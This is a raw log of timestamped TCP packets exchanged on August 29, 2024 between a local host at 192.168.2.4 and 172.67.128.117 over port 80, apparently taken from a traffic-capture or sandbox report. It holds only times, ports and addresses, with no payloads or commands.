                                  Aug 29, 2024 23:42:08.196683884 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196697950 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196698904 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196711063 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196713924 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196721077 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196727037 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196733952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196744919 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196749926 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196755886 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196765900 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196765900 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196778059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196782112 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196789026 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196789980 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196800947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196813107 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196818113 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196824074 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196836948 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196839094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196854115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196854115 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196866035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196872950 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196891069 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196908951 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.197077990 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.197176933 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.197187901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.197197914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.197210073 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.197220087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.197225094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.197231054 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.197235107 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.197242022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.197254896 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.197268963 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.197283983 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.282040119 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.282274961 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.282284975 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.282295942 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.282313108 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.282325029 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.282335997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.282341003 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.282483101 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.282483101 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.282862902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.282872915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.282882929 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.282927990 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.283037901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283049107 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283063889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283075094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283077955 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.283085108 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283094883 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283104897 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283106089 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.283114910 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283123970 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283127069 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.283135891 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283155918 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.283179045 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.283344030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283418894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283458948 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.283483982 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283520937 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.283550024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283560038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283570051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283590078 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.283606052 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.283751011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283761978 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283771992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283782959 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283792019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283792019 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.283804893 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283816099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.283818007 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.283845901 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.283859015 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.284013987 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284110069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284120083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284149885 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.284172058 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.284317970 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284487963 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284506083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284518003 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284532070 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284533024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.284543991 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284553051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284563065 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284567118 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.284573078 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284574986 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.284585953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284591913 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.284596920 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284606934 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284616947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284620047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.284626961 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284638882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284648895 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284655094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.284678936 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.284679890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284692049 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462302923 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462330103 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462340117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462352037 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462363005 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462384939 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462409019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462412119 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462419987 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462430954 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462462902 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462487936 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462515116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462532043 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462543964 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462555885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462578058 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462604046 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462630987 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462642908 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462680101 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462697983 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462712049 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462723017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462733984 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462738037 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462766886 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462790012 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462922096 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462934017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462944031 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462955952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462966919 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462975025 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463005066 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463068962 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463080883 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463090897 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463103056 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463109016 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463115931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463128090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463129997 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463139057 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463157892 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463184118 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463224888 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463242054 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463253975 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463265896 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463268042 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463278055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463290930 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463296890 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463301897 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463323116 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463335991 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463506937 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463522911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463534117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463545084 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463555098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463555098 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463567019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463577986 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463583946 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463592052 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463615894 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463629007 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463644028 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463654995 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463665009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463676929 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463686943 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463695049 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463696957 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463701010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463717937 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.463726044 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463753939 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.463773966 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464044094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464093924 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464123964 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464135885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464168072 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464199066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464210033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464220047 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464242935 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464272976 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464306116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464318991 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464351892 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464363098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464374065 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464378119 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464386940 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464418888 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464437008 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464442968 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464453936 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464495897 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464499950 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464507103 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464519978 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464529037 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464540005 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464565039 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464586020 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464628935 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464648008 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464658022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464673042 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464688063 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464709997 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464759111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464776039 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464787006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464801073 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464801073 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464818954 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464819908 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464832067 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464838028 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464849949 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464850903 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464862108 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464876890 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464879990 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464891911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464901924 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464905977 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464917898 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.464920998 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464948893 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.464971066 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.548691988 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.548707962 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.548718929 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.548736095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.548751116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.548760891 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.548774004 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.548794985 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.548813105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.548986912 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.548986912 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549417973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549513102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549524069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549535036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549570084 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549576998 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549581051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549593925 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549608946 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549618006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549637079 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549664021 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549763918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549774885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549787045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549799919 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549823046 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549832106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549838066 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549845934 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549851894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549856901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549868107 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549881935 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549892902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549905062 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549935102 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549946070 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.549967051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549978018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549988985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.549993992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550021887 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550046921 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550542116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550560951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550571918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550602913 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550614119 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550646067 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550657988 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550668955 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550682068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550699949 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550729036 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550760984 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550771952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550784111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550793886 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550795078 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550823927 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550844908 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550885916 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550898075 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550908089 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550919056 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550928116 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550931931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.550945997 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.550968885 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551052094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551095009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551105976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551136971 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551161051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551162958 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551191092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551203012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551239967 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551337004 CEST8049730172.67.128.117192.168.2.4
